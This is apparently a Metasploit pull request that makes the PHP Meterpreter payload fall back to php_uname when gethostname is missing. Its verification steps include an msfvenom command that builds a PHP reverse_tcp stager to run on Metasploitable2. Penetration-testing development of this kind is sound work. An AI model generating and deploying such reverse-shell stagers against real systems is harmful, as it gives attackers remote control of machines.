### PR TITLE
Use php_uname('n') if gethostname doesn't exist

### DIFF
--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -445,7 +445,12 @@ function get_hdd_label() {
 
 function core_machine_id($req, &$pkt) {
   my_print("doing core_machine_id");
-  $machine_id = gethostname();
+  if (is_callable('gethostname')) {
+    # introduced in 5.3
+    $machine_id = gethostname();
+  } else {
+    $machine_id = php_uname('n');
+  }
   $serial = "";
 
   if (is_windows()) {


### PR DESCRIPTION
[`gethostname`](http://php.net/gethostname) was introduced in PHP 5.3.0; this patch fixes a crash when attempting to call it on PHP versions older than that.

# Verification
- [ ] Set up a handler
- [ ] Make a stager: `./msfvenom LHOST=... LPORT=8888 -p php/meterpreter/reverse_tcp -f raw > met-8888.php`
- [ ] upload it to Metasploitable2 (which has PHP 5.2.4)
- [ ] run it: `php ./met-8888.php`
   - before this fix the session crashes after staging
- [ ] **VERIFY** created session is functional